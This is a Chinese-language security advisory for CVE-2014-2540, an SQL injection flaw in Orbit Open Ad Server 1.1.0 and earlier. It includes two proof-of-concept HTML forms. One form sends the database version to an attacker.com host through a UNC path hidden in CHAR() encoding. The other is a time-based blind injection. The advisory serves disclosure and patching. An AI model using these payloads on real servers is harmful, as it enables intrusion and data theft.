发布日期:2014-04-16
更新日期:2014-04-18
受影响系统:
orbitopenadserver Orbit Open Ad Server < 1.1.0
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2014-2540
Orbit Open Ad是用PHP编写的开源广告服务器。
Orbit Open Ad Server 1.1.0及之前版本没有正确过滤guest/site_directory内的 "site_directory_sort_field" POST 参数,这可使攻击者有机会注入任意SQL代码,执行SQL注入攻击。
<*来源:High-Tech Bridge SA ()
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<form action="http://[host]/guest/site_directory" method="post">
<input type="hidden" value="site_directory_form">
<input type="hidden" value="text">
<input type="hidden" value="1">
<input type="hidden" value="cpm">
<input type="hidden" value="save">
<input type="hidden" value="12">
<input type="hidden" value="1">
<input type="hidden" value="1">
<input type="hidden" value="10">
<input type="hidden" value="asc">
<input type="hidden" value="(select load_file(CONCAT(CHAR(92), CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111), CHAR(111),CHAR(98),CHAR(97),CHAR(114))))">
<input type="submit">
</form>
<form action="http://[host]/guest/site_directory" method="post">
<input type="hidden" value="site_directory_form">
<input type="hidden" value="text">
<input type="hidden" value="1">
<input type="hidden" value="cpm">
<input type="hidden" value="save">
<input type="hidden" value="12">
<input type="hidden" value="1">
<input type="hidden" value="1">
<input type="hidden" value="10">
<input type="hidden" value="asc">
<input type="hidden" value="(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))">
<input type="submit">
</form>
建议:
--------------------------------------------------------------------------------
厂商补丁:
orbitopenadserver
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: